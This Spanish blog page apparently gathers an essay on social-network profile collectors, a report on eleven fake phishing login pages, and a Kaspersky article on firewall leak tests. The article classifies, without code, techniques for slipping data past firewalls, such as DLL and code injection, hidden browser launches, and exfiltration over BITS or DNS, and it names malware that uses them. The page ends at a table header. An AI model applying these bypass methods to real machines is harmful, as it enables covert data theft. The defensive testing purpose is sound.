Todo empezó hace ya bastante tiempo, cuando nos empezamos a dar cuenta de la gran cantidad de información que tienen los buscadores (El Buscador) sobre nosotros: qué queremos encontrar en Internet, qué correos recibimos, qué noticias nos interesan, qué blogs leemos, con quién nos relacionamos, ... Poco a poco se fueron alzando algunas voces intentando concienciarnos del poder que estaban adquiriendo, así como en diferentes partes del mundo se empezaron a tomar iniciativas en formas de leyes y directivas para proteger a sus ciudadanos.

Paralelamente, en nuestra sociedad, apareció paulatinamente la figura del coleccionista de perfiles, rol cuyo principal objetivo es la creación de un perfil personalizado de una persona real. Este comportamiento fue originándose en la clandestinidad, ayudado principalmente por el poco cuidado que tenemos a la hora de dar nuestros datos en Internet, sobre todo en las redes sociales.

Y en tercer lugar estamos nosotros, los ciudadanos, despreocupados por el uso indebido que pudiera realizarse con nuestros datos en Internet, ajenos a la utilización de los mismos ya sea para crear un perfil y ofrecernos ofertas personalizadas, o para robar nuestra identidad.
Pero, ¿cómo trabaja el coleccionista de perfiles? ¿tiene suficiente material para crear los perfiles? Rotundamente sí. Casi todos nosotros estamos inscritos en multitud de redes sociales: MySpace, LinkedIn, FaceBook, eConozco, Orkut, Fotolog, Flickr, Plaxo, Twitter, Bebo, SoulMe, etc., y además, puede que en alguna red pongamos datos falsos para no ser reconocidos, pero también en otros ponemos datos verdaderos, y siempre, hay un nexo de unión, ya sea un nombre de usuario, una fotografía, una frase, un nick, lo que sea, pero siempre hay forma de enlazar la página con datos falsos (pero que puede que tenga algún dato verdadero útil para nuestro coleccionista), y la página con datos verdaderos.

Hagamos una prueba: pidamos a un amigo que intente crear un perfil de nosotros en base a lo que vaya encontrando por Internet y que vayan apuntando en un papel (o en el vim el que prefiera) todos los datos que aparecen sobre lo que creen que somos nosotros:

  • Datos personales: nombre, dirección, correo, teléfono, fecha de nacimiento, estudios, trabajo, aficiones, música, deportes, ...
  • Fotografías
  • ¿A quién conocemos?
  • ¿Dónde ponemos comentarios?¿Qué ideas expreso con mis comentarios?
  • ¿A qué horas suelo estar conectado en ciertas páginas?
  • Etc.

¿Sorprendidos? Ahora pensemos en la figura del coleccionista, que está haciendo lo mismo para cada uno de nosotros. ¿Tiene un poder semejante a la información que dispone un buscador? No tan grande, pero aún así, es algo preocupante. ¿Es muy difícil crear una aplicación que vaya recorriendo todos los portales de redes sociales intentando "casar" todos los perfiles para crear un portal donde exista un perfil más completo de todos nosotros? No, de hecho es la que usa nuestro coleccionista.

En el sueño, con el paso del tiempo (la noche) el coleccionista se hacía con el control total del mundo, manipulando a su antojo todo lo que deseaba y negociando con la información que poseía. ¿Hasta donde somos vulnerables? Menos mal que en algún momento de la noche, quizás abrumado por las consecuencias, desperté con un pequeño sobresalto.

Recomendaciones para la utilización de redes virtualesSecurity Issues and Recommendations for Online Social Networks

Ver más

ONCE PHISHING EN SITIOS DE CORREO POPULARES

En junio de 2007 desde Segu-Info reportamos multiples casos de Phishing a cuentas Gmail realizadas a argentinos. En ese momento nadie tomó en serio estos casos y los mismos se han vuelto ha producir en estos días.

El mismo código fuente de aquella vez fue hallado en un reconocido hosting argentino en uno de sus servidores (accesible vía dirección IP), mediante el cual ofrecen servicios web a sus clientes. Estas páginas ya han sido dadas de baja por el proveedor por eso publicamos el caso.

Más alla del agujero de seguridad evidente en este proveedor, el caso habla a las claras de una persona o grupo que se dedica a subir estos sitios falsos para luego robar datos de usuarios desprevenidos.

Lo más curioso del caso es que los sitios web falsos, a pesar de permanecer muchos días online, no han tenido mayor recpercusión debido a que los correos que se envían no son masivos sino que parecen ser dirigidos a ciertas personas o empresas, lo que hablaría de un ataque premeditado.

Uno de estos correos nos fue facilitado por un damnificado:

Si se cae en la trampa y se ingresa a la dirección IP ofrecida, estaremos regalando nuestros datos a un estafador.

A continuación expongo las imágenes de los once formularios falsos, para que se tenga una idea clara de lo sucedido y de la magnitud del caso. Se puede apreciar como cambia el último número en cada una de las URL involucradas.

1. Gmail

2. MSN

3. Yahoo!

4. Fibertel

5. Ciudad

6. Arnet

7. Sion

8. Speedy

9. RSA

10. OWA

11. Ministerio de Planificación

Como puede apreciarse los servicios son múltiples y variables.
Analizando el código fuente de los HTML puede verse que los involucrados son los mismos y que realizan estas acciones en forma sistemática.

cfb

Fuente: www.segu-info.com.ar

Ver más

jueves, 3 de enero de 2008

LAS PRUEBAS DE FUGAS COMO MÉTODO PARA EVALUAR LA EFECTIVIDAD DE UN CORTAFUEGOS

Nikolay Grebennikov

Un cortafuegos es una herramienta adicional de seguridad que adquiere creciente importancia a medida que se acelera el desarrollo de nuevos programas maliciosos. El cortafuegos bloquea él tráfico no deseado en redes, tanto entrante como saliente. Las pruebas de fugas, tema del presente artículo, evalúan la fiabilidad del cortafuegos en cuanto al control del tráfico saliente y a la protección contra fugas de datos.

¿Qué es un cortafuegos?

Una de las funciones de los modernos sistemas integrados de seguridad es permitir que el usuario controle el tráfico en la red, es decir, los datos enviados y recibidos a través de la red por aplicaciones ejecutadas en el ordenador del usuario. El componente que posibilita este control se llama cortafuegos (firewall). Hay cortafuegos de software y de hardware (http://en.wikipedia.org/wiki/Personal_firewall). Este artículo sólo abarca los cortafuegos de software.

Existen muchos cortafuegos de software, tanto comerciales como gratuitos. Un cortafuegos instalado en un gateway (un servidor que transfiere el tráfico entre diferentes redes) se conoce como un cortafuegos de servidor o de nivel de red. Un cortafuegos instalado en el ordenador del usuario se conoce como un cortafuegos personal, ya que en este caso se limita a proteger sólo el ordenador donde está instalado. Los modernos cortafuegos personales suelen venir integrados en sistemas de seguridad para ordenadores personales. Un ejemplo es el cortafuegos personal incorporado en Kaspersky Internet Security 7.0.


Figura 1. Componente incorporado en Kaspersky Internet Security 7.0

Para realizar su principal tarea, es decir, el control de las actividades en una red, los cortafuegos utilizan una lista de reglas que permiten o prohíben dichas actividades para diferentes aplicaciones. Una regla puede incluir varios parámetros, tales como la dirección en la que se transfieren los datos, protocolos de transferencia de datos (IP, TCP, UDP, ICMP, etc.), direcciones IP y puertos para ordenadores locales y remotos que intercambian datos.

Una regla para controlar las actividades en la red puede emplearse para todas las aplicaciones en el sistema. En este caso, se la conoce como regla de paquete.


Figura 2. Ejemplos de reglas para Microsoft Outlook en Kaspersky Internet Security 7.0

Los modernos cortafuegos pueden operar en dos modos distintos: interactivo, cuando se consulta al usuario los pasos a seguir, y no-interactivo. En el modo no-interactivo, el cortafuegos puede:

  1. permitir cualquier actividad que no esté prohibida por las reglas;
  2. bloquear cualquier actividad que no esté permitida por las reglas; o
  3. bloquear toda actividad en la red.

El principal modo operativo del cortafuegos es el interactivo, que también se conoce como modo de entrenamiento. En este modo, cuando el cortafuegos detecta alguna actividad en la red que no esté sujeta a ninguna regla predefinida, despliega una ventana de diálogo solicitando al usuario que permita o bloquee por una sola vez dicha actividad, o que cree una regla para ese tipo de actividad en la red.


Figura 3. Ventana de diálogo desplegada en el modo de entrenamiento del cortafuegos de Kaspersky Internet Security 7.0

Puesto que existen decenas de aplicaciones en el ordenador de un usuario regular, que generan diferentes tipos de actividades en la red mientras operan, el crear una lista de reglas que describan la actividad en la red de cada aplicación se convierte en una tarea difícil y morosa. Debido a esto, los desarrolladores de cortafuegos incluyen en sus productos bases de datos de reglas preinstaladas para aplicaciones conocidas de redes, tales como Internet Explorer, Microsoft Outlook, Generic Process for Win32 Services (svchost.exe), Microsoft Application Error Reporting (dwwin.exe) y muchas otras aplicaciones.


Figura 4. Lista de reglas preinstaladas de aplicaciones para el cortafuegos de Kaspersky Internet Security 7.0

El siguiente diagrama ilustra la idea fundamental de la operación de un cortafuegos en cuanto al monitoreo de datos salientes y a la protección contra fugas de datos desde el ordenador:


Figura 5. La idea fundamental de la operación de un cortafuegos

Un cortafuegos interpone una “pared” que separa las aplicaciones en el ordenador del usuario de otros ordenadores en la red local y en Internet. Para aplicaciones conocidas o fiables (en verde en la figura 5), existen reglas que permiten (“huecos” en la “pared”) que estas aplicaciones transfieran datos al exterior a través del cortafuegos. Cuando otra aplicación trata de establecer actividades en la red, estas se bloquean (“se estrellan contra la pared”) y no puede transmitir datos al exterior, ni recibir datos del otro lado de la pared. Asimismo, el usuario pueden crear nuevas reglas que permitan (nuevos “agujeros” en la “pared”) que las aplicaciones intercambien datos en la red.

Debe notarse que algunos cortafuegos también incluyen un componente de protección contra ataques de intrusos. Dicho componente analiza el tráfico saliente de la red en busca de paquetes de red que coincidan con muestras conocidas en la base de datos de ataques a redes. Este componente será objeto de un análisis detallado en futuros artículos.

¿Cómo mejora la seguridad un cortafuegos?

Un cortafuegos brinda una “capa” adicional de protección para bloquear programas maliciosos que no hubiesen sido detectados por el componente antivirus del sistema integrado de seguridad. Esta situación puede presentarse si la descripción de un programa malicioso aún no ha sido añadida a la base de datos antivirus (por lo que la protección tradicional en base a signaturas no funcionará), mientras que el programa no demuestre de manera inequívoca un comportamiento hostil o incluso sospechoso (y por lo tanto el analizador de comportamiento tampoco lo detectará).

¿Contra qué tipo de programas maliciosos puede proteger un cortafuegos? En realidad, contra cualquier programa malicioso en vigencia. Esto puede sonar demasiado audaz, pero es verdad: llla operación de la mayoría de los modernos programas maliciosos se basa en actividades en la red y por lo tanto el cortafuegos puede neutralizarlos.

Los gusanos de red distribuyen copias de sus códigos en redes locales y/o globales.

Los troyanos, que actualmente constituyen el 91.4% de todos los programas maliciosos, también intercambian datos en la red como parte de sus “funciones vitales”. Los programas troyanos incluyen:

  • Puertas traseras (backdoors) – utilidades para la administración remota de ordenadores de la red. Las puertas traseras se controlan de modo remoto y un cortafuegos puede neutralizar con facilidad la funcionalidad de estos programas maliciosos.
  • Troyanos PSW – son programas que “roban” todo tipo de información desde los ordenadores infectados. Tras robar los datos confidenciales, un troyano necesita un medio para hacer llegar esos datos al delincuente cibernético, y es en esta etapa que un cortafuegos puede bloquear todo intento por enviar dichos datos, logrando así proteger la información del usuario.
  • Troyanos Downloaders – son programas que descargan nuevas versiones de programas maliciosos e instalan troyanos y programas publicitarios (adware) en el ordenador infectado. Toda operación de programas en esta categoría se basa en el intercambio de datos en la red, el cual un cortafuegos puede bloquear con facilidad.
  • Troyanos Proxies – son programas que logran acceso invisible y anónimo a varios recursos de Internet. Estos programas se usan por lo general para enviar correo no deseado (spam). Así como sucede con los Troyanos Downloaders, un cortafuegos puede neutralizar con facilidad la actividad en la red que los Troyanos Proxies requieren para su operación.
  • Troyanos Espía – son programas que realizan espionaje electrónico en ordenadores infectados. Los datos, incluyendo la información ingresada por medio del teclado, imágenes de pantalla capturadas, listas de de aplicaciones activas y acciones de los usuarios respecto a estas aplicaciones, se guardan en un archivo en el disco duro y se envían regularmente al delincuente cibernético. En esta etapa, el cortafuegos puede neutralizar todo intento de un programa desconocido para enviar datos. Esto previene que la información del usuario que el troyano robó llegue al autor del programa malicioso.

Debe notarse que los cortafuegos no pueden usarse para combatir virus informáticos clásicos porque a diferencia de los gusanos, los virus no recurren a recursos de la red para penetrar otros ordenadores y, a diferencia de los troyanos, no necesitan enviar datos o recibir instrucciones.

Un cortafuegos es un sistema de seguridad difícil de sortear. Para evadir la protección antivirus y el bloqueador de comportamiento, los autores de programas maliciosos pueden poner a prueba sus nuevos productos realizando todos los cambios necesarios hasta que ambos componentes de seguridad fallen en la detección del código malicioso. Resulta muy difícil superar un cortafuegos con dicho método. Si un programa requiere de cierto tipo de actividad en la red, resulta muy difícil ocultar esta actividad al cortafuegos. La única manera de hacerlo es a través de fugas.

¿Qué son fugas y qué son las pruebas de fugas?

Una fuga es una tecnología para burlar los mecanismos de control de actividades en la red que posee un cortafuegos; dicha tecnología permite que las aplicaciones que no estén sujetas a ninguna restricción en la lista de reglas del cortafuegos logren enviar datos fuera de la red. El cortafuegos no puede impedir que estos datos se envíen y, en el modo de entrenamiento, tampoco informa al usuario sobre esta actividad en la red.

Un cortafuegos bien diseñado no debería permitir ninguna fuga. Debería ser capaz de identificar todo intento de actividad entrante y saliente en la red. Por esta razón se utilizan dos criterios para analizar la calidad de la protección brindada por un cortafuegos: La calidad de la protección entrante, es decir, protección contra penetraciones provenientes del exterior de la red, y la calidad de la protección saliente, es decir, protección contra fugas de información desde el ordenador.

Se realizan varios análisis de puertos abiertos (por ejemplo, ShieldsUP!, http://www.grc.com/default.htm, Quick test http://www.pcflank.com/test.htm, etc.) para comprobar la protección del cortafuegos contra penetraciones del exterior.

El análisis de la efectividad de la protección del cortafuegos contra fugas de datos se realiza mediante pruebas de fugas – pequeños e inofensivos programas que implementan una o más fugas. Tales programas los desarrollan, por lo general, investigadores y expertos en seguridad.

Resulta evidente que la única manera para implementar una fuga es utilizando los “huecos” existentes (reglas de permisos) para aplicaciones conocidas. Sin embargo, hay que “persuadir” al cortafuegos de que es una aplicación fiable la que inicia la actividad en la red. Existen varios métodos que se pueden usar para ello. Antes de abordar estos métodos, veamos los principios básicos en los que se basa la ejecución de aplicaciones en los modernos sistemas operativos.


Figura 6. Cómo funciona una fuga

Principios de la ejecución de aplicaciones en los modernos sistemas operativos

La CPU de un ordenador personal puede ejecutar varios juegos de instrucciones que se almacenan en la memoria RAM del ordenador. Los juegos de instrucciones se agrupan en hilos de ejecución que pertenecen a procesos que se ejecutan en la memoria RAM.

Los archivos ejecutables incluyen juegos de instrucciones para la CPU y cuando se lanza un archivo ejecutable, un nuevo proceso aparece en el sistema. Un proceso también puede crear otro proceso. El sistema operativo mantiene un árbol de procesos en la memoria RAM.

Debe notarse que el espacio para direcciones en la mayoría de los procesos del sistema incluye no sólo el código del archivo ejecutable de la aplicación, sino también el código de varias bibliotecas DLL (dynamic-link libraries). Las bibliotecas DLLs se usan para almacenar ciertas funciones compartidas que varias aplicaciones utilizan. Esto permite que los autores eviten la duplicación del mismo código de programa en diferentes archivos ejecutables. Se puede cargar la misma biblioteca en el espacio para direcciones de diferentes procesos.


Figura 7. El fundamento de la ejecución de una aplicación

Clasificación de las tecnologías de fugas

Ideas fundamentales en la implementación de fugas

En esta sección analizaremos las tecnologías que una aplicación maliciosa puede utilizar para “burlar” un cortafuegos. La situación inicial aparece ilustrada en la figura 8; se muestran también procesos de aplicaciones fiables en la memoria RAM reconocidas por el cortafuegos, así como el proceso de una aplicación desconocida (maliciosa).


Figura 8. Situación inicial para la implementación de una fuga

El cortafuegos bloqueará todo intento de una aplicación desconocida para iniciar por sí misma actividades en la red, o bien desplegará una ventana de diálogo consultando al usuario sobre las acciones a seguir.

Hay tres ideas principales que posibilitan evadir la protección del cortafuegos:

  1. Engañar al cortafuegos, es decir, persuadirlo de que es una aplicación confiable la que inicia actividades en la red, sustituyendo el código ejecutable de una aplicación confiable en el disco duro o sustituyendo los datos de un proceso fiable en la memoria RAM con los datos del procesos desconocido.
  2. Ejecutar un código en nombre de la aplicación confiable mediante la inyección de una DLL o de una pequeña porción del código de la aplicación desconocida en el espacio para direcciones de una aplicación confiable. El cortafuegos no podrá distinguir entre la actividad en la red de tales elementos inyectados y la actividad normal en la red de la aplicación confiable.
  3. Uso de interfaces documentadas provistas por aplicaciones confiables. Al usar dichas interfaces, una aplicación confiable iniciará la actividad en la red, pero estará bajo el control de la aplicación maliciosa que logrará transferir datos a través de estas interfaces a destinatarios externos sin llegar a activar las alarmas del cortafuegos.

Existen seis tecnologías de fugas que implementan las tres ideas arriba mencionadas:

№№ (engaño) (ejecución de códigos a nombre de una aplicación confiable) (uso de interfaces documentadas)
1 Sustitución

2
Lanzamiento
3
Inyección DLL
4
Inyección de códigos
5

Servicios del navegador
6

Servicios del sistema

A continuación aparecen descripciones más detalladas de estas tecnologías y sus posibles implementaciones.

Tecnologías de fugas

Sustitución

Sustitución del código ejecutable de una de las aplicaciones confiables en el disco duro o sustitución de los datos de un proceso confiable en la memoria RAM por datos de un proceso desconocido. La idea en este método es “persuadir” al cortafuegos de que es un proceso confiable el que inicia la actividad en la red.

Se pueden identificar tres métodos de sustitución:

  1. sustitución del archivo ejecutable de uno de los procesos confiables en el disco duro (implementado en la prueba de fugas Runner, referirse a la sección Pruebas de fugas);
  2. sustitución del nombre del archivo de la aplicación desconocida por el nombre del archivo de una aplicación confiable (Leaktest);
  3. sustitución de los datos de un proceso confiable por los datos del proceso desconocido en una imagen de proceso cargada en la memoria RAM (Coat).

El siguiente gráfico ilustra la primera variante de sustitución:


Figura 9. Método basado en la sustitución del archivo de un proceso confiable en el disco duro

Lanzamiento

Lanzamiento de una aplicación confiable con parámetros de línea de órdenes. La idea en este método se basa en el hecho de que la mayoría de los navegadores pueden aceptar la dirección de un sitio web para abrirlo como un parámetro de línea de órdenes. Si la página web incluye una rutina (script) en el servidor de Internet (por ejemplo, cgi), el espacio de direcciones también puede incluir parámetros que la rutina utilizará como insumo. Estos parámetros pueden incluir información confidencial, por ejemplo, datos robados por un programa espía. Es importante notar que el navegador ejecuta las actividades en la red con toda normalidad, de manera que las reglas del cortafuegos siempre lo permitirán.

Para evitar que el usuario note la ventana del navegador, por lo general éste se lanza en modo oculto (Ghost, TooLeaky, Wallbreaker [1]).

Los códigos maliciosos también pueden activar el navegador mediante otros procesos en vez de hacerlo de manera directa. Por ejemplo:

  1. lanzar el navegador utilizando el proceso Windows Explorer.exe (Wallbreaker [2]);
  2. lanzar el navegador utilizando el proceso Windows Explorer.exe que se activa mediante la instrucción intérprete cmd.exe (Wallbreaker [3]);
  3. lanzar el navegador utilizando el mecanismo de programación de tareas de Windows (Wallbreaker [4]); En este caso, la secuencia en la que se lanza el proceso es como sigue: AT.exe -> Svchost.exe-> Cmd.exe->Explorer.exe-> IExplore.exe.

El gráfico a continuación ilustra este método:


Figura 10. Método basado en el lanzamiento de una aplicación confiable con parámetros de línea de órdenes

Inyección DLL

Inyección de una biblioteca DLL en el espacio de direcciones de un proceso confiable. Este método consiste en introducir la DLL de un programa malicioso en el espacio de direcciones de un proceso confiable. Existen varias formas de lograr esto, pero los principales métodos son:

  1. instalación de un interceptor global cuyo código se encuentre en la biblioteca DLL (CPILSuite [2,3], FireHole, pcAudit, pcAudit2);

introducción del valor de registro de un sistema para añadir una biblioteca DLL a la lista de DLLs que el sistema carga automáticamente en cada nuevo proceso: la llave AppInit_DLLs (Jumper).

Debe notarse que ambos métodos son legítimos y documentados.

El siguiente gráfico ilustra este método de fugas:


Figura 11. Método basado en la inyección de una DDL en un proceso confiable.

Inyección de códigos

Inyección de un código en el espacio de direcciones de un proceso confiable sin utilizar una DLL. Este método consiste en inyectar un código ejecutable en el espacio de direcciones de un proceso confiable. Tras la inyección, este código puede dar inicio a cualquier actividad en la red, ya que el cortafuegos lo considerará como la actividad de una aplicación confiable. A diferencia del método de inyección de DLL, no es evidente que esta sea una operación legítima, aunque sí existen métodos documentados para la inyección de códigos en otros procesos de aplicaciones. Programas legítimos, como por ejemplo los debuggers, a veces utilizan esta inyección de códigos, pero en general son los programas maliciosos los que más se valen de ellos.

Existen varios métodos para inyectar códigos en procesos de otras aplicaciones. A continuación se brinda algunos ejemplos:

  1. cargar un proceso confiable en la memoria RAM y parchar la memoria del proceso (AWFT [1], CPIL, DNStest). Puede estar precedido por un intento de evitar que el cortafuegos detecte esta operación mediante la desactivación de los interceptores del cortafuegos (CPILSuite[1]);
  2. encontrar un proceso confiable en la memoria RAM e inyectarle un código (Thermite);
  3. cargar un proceso confiable en la memoria RAM y crearle una línea de ejecución remota (AWFT [2,3]);
  4. cargar un proceso confiable en la memoria RAM, crearle una línea de ejecución remota, cargar otro proceso confiable desde esta línea de ejecución y parchar su memoria antes de ejecutarlo (AWFT [4,5,6]);
  5. usar la función SetThreadContext para controlar una línea de ejecución en un proceso confiable (CopyCat).

Los procesos atacados casi siempre son los de los navegadores de Internet (Internet Explorer, etc., pruebas AWFT [1,2,4], CopyCat y Thermite), la interfaz de usuario del sistema operativo (explorer.exe – AWFT [3,4], CPIL y CPILSuite [1]) y del proceso svchost.exe, que es el principal proceso para los servicios de Windows cargados desde DLLs (prueba DNStest).

El siguiente gráfico ilustra este método de fugas:


Figura 12. Método basado en la inyección de códigos maliciosos en un proceso confiable

Servicios del navegador

Uso de interfaces de programa para controlar el navegador de Internet. Este método consiste en aprovechar los diversos mecanismos disponibles en Windows para la interacción entre los procesos de diferentes componentes/aplicaciones. Estos mecanismos incluyen:

  1. envío de mensajes de Windows a la ventana del navegador de Internet, cambiando el valor en el espacio de direcciones del navegador; la activación del botón GO desvía el navegador hacia la dirección recién insertada (Breakout);
  2. uso de la interfaz DDE (Intercambio Dinámico de Datos o Dynamic Data Exchange) del navegador (http://en.wikipedia.org/wiki/Dynamic_Data_Exchange). La biblioteca DDE se desarrolló para expandir las capacidades del sistema de mensajes de Windows, permitiendo que dos aplicaciones realicen un intercambio dinámico de datos durante su ejecución (la compatibilidad de DDE con diferentes versiones de Internet Explorer se encuentra descrita en el artículo http://support.microsoft.com/kb/q160957) (Surfer, ZAbypass, WB [1,3,4]; CPILSuite [3]);
  3. uso del navegador como servidor de automatización (el mecanismo OLE de automatización se basa en el modelo COM, http://en.wikipedia.org/wiki/Object_Linking_and_Embedding, http://en.wikipedia.org/wiki/Component_object_model). La automatización OLE es una extensión de la tecnología DDE. Todos los modernos navegadores llevan incluida la interfaz COM (http://en.wikipedia.org/wiki/Component_object_model) que otros programas pueden usar como servidor de automatización. Existen dos componentes COM de Microsoft Internet Explorer en aplicaciones externas (http://msdn2.microsoft.com/en-us/library/aa741313.aspx):
    • WebBrowser Control, implementado en el archivo shdocvw.dll (OSfwbypass),
    • La interfaz MSHTML implementada en mshtml.dll (PCFlank).

El siguiente gráfico ilustra este método de fugas:


Figura 13. Método basado en el uso de interfaces de programa para controlar el navegador

Servicios del sistema

Uso de interfaces de programa provistos por los servicios del sistema. Este método es similar al método de los servicios del navegador arriba mencionado. La diferencia radica en que las interfaces de programa utilizadas son provistas por los componentes del sistema operativo y no por el navegador de Internet. Windows XP y Windows Vista tienen al menos tres interfaces:

  1. BITS (Background Intelligent Transfer Service, http://msdn2.microsoft.com/en-us/library/Aa362827.aspx) es un servicio inteligente de descarga de archivos utilizado por Windows Update y Windows Server Update Services. Permite la descarga de parches y actualizaciones en segundo plano, sin sobrecargar los canales de comunicación. También reinicia de manera automática las descargas si se pierde la conexión (BITSTester);
  2. Las funciones de Windows DNS API (http://msdn2.microsoft.com/en-us/library/ms682100.aspx) pueden usarse para realizar solicitudes DNS recursivas a un servidor de nombres de Internet. Se puede enviar datos adicionales, incluyendo la información confidencial del usuario, como parte del paquete DNS. Un delincuente cibernético que controle un servidor de nombres que procese solicitudes DNS puede obtener esta información procesando este paquete DNS especialmente conformado (DNStester);
  3. La interfaz para el manejo de los elementos del escritorio de Windows y los fondos de pantalla (IActiveDesktop, http://msdn2.microsoft.com/en-us/library/ms647199.aspx) pueden usarse para establecer una página HTML como fondo de pantalla del escritorio de Windows tras la activación de Windows Active Desktop. Esta página HTML puede incluir elementos que vinculen a recursos externos, propiciando que estos recursos se carguen al activarse un nuevo protector de pantalla para el escritorio (Breakout2).

Diferencias entre las actuales clasificaciones de fugas

Debe notarse que la clasificación arriba descrita casi no se diferencia de las clasificaciones de tecnologías de fugas publicadas en sitios web dedicados al análisis de fugas.

Hasta donde sabemos, el primer sitio web en publicar una investigación sistemática de fugas fue http://www.firewallleaktester.com. En http://www.firewallleaktester.com/categories.htm pueden verse clasificaciones de fugas.

En 2006, otro sitio web hizo su aparición: http://www.matousec.com. Uno de sus principales proyectos es Windows Personal Firewall Analysis (http://www.matousec.com/projects/windows-personal-firewall-analysis/introduction-firewall-leak-testing.php). La clasificación de fugas usada en esta investigación es similar a la utilizada en http://www.firewallleaktester.com, pero existen algunas diferencias.

A continuación se explican las diferencias entre ambas clasificaciones. Nuestra clasificación no considera estos métodos:

№№ Método según
www.firewallleaktester.com
Método según www.matousec.com
1 Hidden rules (Reglas ocultas) Default Rules (Reglas por defecto)
2 Direct network interface use (Uso directo del interfaz de red) Own Protocol Driver (Controlador del propio protocolo)
3 Timing attack (Ataque temporizado)
4 Recursive requests (Solicitudes recursivas)
5 Registry injection (Inyección de registros)
6 Un juego de métodos: Windows Messaging + OLE Mensajes de Windows y Automatización, DDE
7
Cese de la intercepción (unhooking)

Estos métodos no se consideran en nuestra clasificación por las siguientes razones:

  1. El método de las reglas ocultas no constituye en sí una fuga (ver más arriba la definición de fuga) ya que no implementa ninguna tecnología para evitar el mecanismo de control de actividades en la red del cortafuegos. Verifica el juego de reglas de paquete (aplicadas a todas las aplicaciones en el sistema) que el cortafuegos utiliza por defecto. Si uno de los puertos de red se encuentra abierto para todas las aplicaciones, las aplicaciones maliciosas también podrán utilizarlo para enviar datos a destinatarios fuera de la red.
  2. El método del uso directo de la interfaz de red vulnera los mecanismos de filtrado de tráfico en la red en el nivel “bajo”. El método consiste en escribir una pila alternativa de controladores de red que procesen paquetes provenientes del adaptador de red en paralelo con las pilas del sistema (TCP/IP, etc.). Este método no está considerado en nuestra clasificación porque actualmente no hay implementaciones (pruebas de fugas) que logren ejecutarse bajo los modernos sistemas operativos, como Windows XP / Vista. Además, es improbable que aparezcan en el futuro nuevas pruebas de fugas (o programas maliciosos) que utilicen este método, ya que es mucho más complicado que cualquier otro método para la implementación de ataques de fugas. Sin embargo, debe notarse que hay tres pruebas de fugas que funcionan bajo el ahora obsoleto Windows 9x y que utilizan este método de fugas:
    • MbTest (autor: “mbcx8nlp”, 2003), usa la biblioteca Winpcap,
    • Outbound (autor: HackBusters, 2001),
    • YALTA [2] (autor: Soft4ever, 2001).
  3. El método de ataques temporizados no se considera en nuestra clasificación como un método separado ya que actualmente ningún cortafuegos puede ser vulnerado mediante la tecnología en la que se basa (reinicio de sus propios procesos para cambiar el PID, es decir, el identificador de procesos).
  4. En nuestra clasificación, el método de solicitudes recursivas está incluido en el grupo Servicios del Sistema.
  5. En nuestra clasificación, el método de inyección de registro se clasifica como una variante del método de inyección de DLL, ya que la esencia de este método no radica en la modificación del registro, sino en la inyección de una DLL en procesos confiables. Es evidente que uno de los métodos para lograr esto es mediante el uso una llave especial de registro.
  6. En nuestra clasificación, los métodos agrupados bajo el título Windows Messaging + OLE están incluidos en los grupos Servicios del Navegador y Servicios del Sistema. Creemos que esto es más lógico puesto que en vez de corresponder a los métodos técnicos de implementación (envío de mensajes, etc.), refleja más bien la esencia de la tecnología de fugas a un nivel superior: mediante el uso de interfaces de programa para controlar el navegador o mediante el uso de los servicios de red del sistema.
  7. Cese de la intercepción (unhooking) Este método se basa en la siguiente idea: Para asegurar la protección contra algunas tecnologías de fugas, los cortafuegos usan los interceptores de funciones del sistema. Si estos interceptores se desactivan (“unhooked”), el cortafuegos no podrá evitar las fugas. Se desprende de esta descripción que este método no es una fuga en sí, y por lo tanto no figura en nuestra clasificación de fugas. Sin embargo, cuando se usa en combinación con cualquier otro método real de fugas, ayuda a verificar la efectividad de la protección del cortafuegos contra ese método de fugas bajo las más duras condiciones, imitando una situación en la cual un código malicioso bloquea activamente la funcionalidad del cortafuegos.

El uso de fugas en programas maliciosos

Hace pocos años, los cortafuegos apenas se utilizaban en la protección de ordenadores personales. Por esta razón, sólo un reducido número de programas maliciosos usaba las fugas para vulnerar la protección del cortafuegos. Sin embargo, los autores de programas maliciosos recientemente han estado adoptando herramientas de automatización para crear con rapidez nuevas variantes de sus programas maliciosos, y el número de programas maliciosos se ha ido incrementado de manera sostenida. Debido a ello, las herramientas que brindan seguridad personal a los ordenadores personales han adquirido mayor importancia, lo que ha popularizado los cortafuegos.

En vista de esta alza en popularidad de los cortafuegos, los autores de programas maliciosos están recurriendo activamente a las fugas para vulnerar su protección. A continuación, ofrecemos algunos ejemplos de programas maliciosos reales que utilizan cada uno de los seis principales métodos de fugas.

№№ Método Programa malicioso Fecha de detección Descripción
1 Sustitución Backdoor.Win32.Bifrose.aer 26 de marzo de 2007 Reemplaza a MSN Messenger (C:\Program Files\MSN Messenger\msnmsgr.exe) con una copia de sí mismo
2 Lanzamiento con parámetros de líneas de ejecución Trojan-Spy.Win32.Agent.se 26 de julio de 2007 Lanza Internet Explorer en una ventana oculta con el enlace a un archivo HTML en la línea de ejecución
3 Inyección DLL Trojan-Spy.Win32.Goldun.pq 11 de junio de 2007 Registra una DLL en la llave de registro AppInit_DLLs y la utiliza para interceptar el tráfico en Internet
4 Inyección de códigos en un proceso confiable Trojan-Spy.Win32.Delf.uc 19 de enero de 2007 Crea un hilo en el proceso winlogon.exe y lo utiliza para enviar datos a través de Internet
5 Servicios del navegador Trojan-PSW.Win32.LdPinch.bix 4 de enero de 2007 Usa la interfaz IWebBrowser2 COM para enviar la información recogida
6 Servicios del navegado Trojan-Downloader.Win32.Nurech.br 4 de enero de 2007 Usa la interfaz IWebBrowser2 COM para enviar la información recogida

Debe notarse que varios tipos de fugas sirven a diferentes propósitos y se usan en programas maliciosos para lograr variados objetivos. De manera específica:

  1. Los parámetros de líneas de ejecución del navegador sólo permiten enviar un número limitado de datos, mientras que un programa malicioso puede usar la tecnología BITS para enviar archivos muy grandes desde el ordenador del usuario.
  2. Los métodos basados en la inyección de DLL o de códigos en procesos confiables también se emplean para otros propósitos distintos a vulnerar cortafuegos; pueden usarse no sólo para enviar datos en nombre de procesos confiables sin el conocimiento del usuario, sino también para realizar una variedad de operaciones.
  3. Las interfaces de control del navegador (por ejemplo, WebBrowser control) se pueden usar no sólo para enviar datos en nombre de Internet Explorer, sino también para controlar la copia en ejecución del navegador (por ejemplo, cerrar todas las ventanas en las cuales la dirección de la página no satisfaga ciertas condiciones), para modificar el documento cargado en el navegador, para desplegar ventanas de mensajes en el navegador, etc.

Pruebas de fugas (Leak tests)

La tabla a continuación muestra una lista de pruebas de fugas conocidas actualmente y los métodos de fugas que someten a prueba. La mayoría de las pruebas en esta lista se pueden descargar desde http://www.matousec.com/projects/windows-personal-firewall-analysis/introduction-firewall-leak-testing.php o http://www.firewallleaktester.com.

№№ Nombre Autor Método Año
